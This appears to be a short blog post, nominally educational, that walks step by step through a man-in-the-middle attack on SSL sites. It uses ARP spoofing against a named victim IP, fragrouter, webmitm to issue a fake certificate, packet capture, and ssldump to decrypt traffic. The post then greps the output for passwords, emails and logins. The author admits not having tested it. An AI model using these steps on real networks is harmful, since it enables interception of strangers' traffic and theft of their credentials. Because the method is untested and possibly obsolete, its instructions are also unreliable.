Method-Using SSLDump (Educational Purposes only)

I have looked around many post described Ssldump  for *nix platform . In my opinion this would be the best example  some  one write, this tutorial on how to Arp Cache Poison SSL Websites. Or in other order to use on sites SSL.
this information I have not test yet because. I have facing ssldump ERROR: Couldn’t create network handler
Tools Required
Fragrouter
Arpspoof
Dnsspoof
Webmitm
Ethereal (Or Wireshark as I believe its called these days)
SSLdump

Method
In a console do the following:
1) fragrouter -B1
2) arpspoof -t VictimsIP Router Eg, arpspoof -t 192.168.1.100 192.168.1.1

This will placed yourself between the Router (192.168.1.1) and your victim (192.168.1.100)
This will create a SSL Certificate that the victim will hopefully accept. If they dont, the attack will be unsuccessful.

3) webmitm -d You will need to fill in the required fields. This is your certificate.
4) Open up Ethereal and start capturing your packets.

When (if) the victim accepts your fake SSL certificate, Ethereal will start getting a lot of activity. When this happens, stop Ethereal and save your packets to a dump file.

Now its time to read the data

5) ssldump -r <dumped-file-name> -k webmitm.crt -d > DUMP

What that command will do is open your Ethereal dump file DUMPFILE and run it against your fake certificate webmitm.crt and write the data to a file called DUMP. The DUMP file will contain the unencrypted packets.

You can now just GREP the dump file to find the login data. For example,

cat dump | grep PASSWORD

You can change PASSWORD to other interesting things such as EMAIL, LOGIN etc…

I  have not tested yet but people are saying this on lots of occasions may be it working for some or this may be obsolete method.  What every this method is but it is purely for educational purposes.

Related Posts:

• No Related Posts

Related Websites

• Network Marketing - Are you Taking Massive Action? (function() {var s = document.createElement('SCRIPT'), s1 = document.getElementsByTagName('SCRIPT')[0];s.type = 'text/javascript';s.async = true;s.src = 'http://widgets.digg.com/buttons.js';s1.parentNode.insertBefore(s, s1);})(); 3Digg Digg (function() {var s = document.createElement(‘SCRIPT’), s1 = document.getElementsByTagName(‘SCRIPT’)[0];s.type...
• Free Success Ebook: "The Creative Process in the Individual" by Thomas Troward "IT IS an old saying that “Order is Heaven’s First Law,” and like many other old sayings it contains a much deeper philosophy than appears...
• Another trackback spam storm overnight.... All of the the swarms of trackback spam seemed to last an hour give or take a few minutes, so it does look kind of...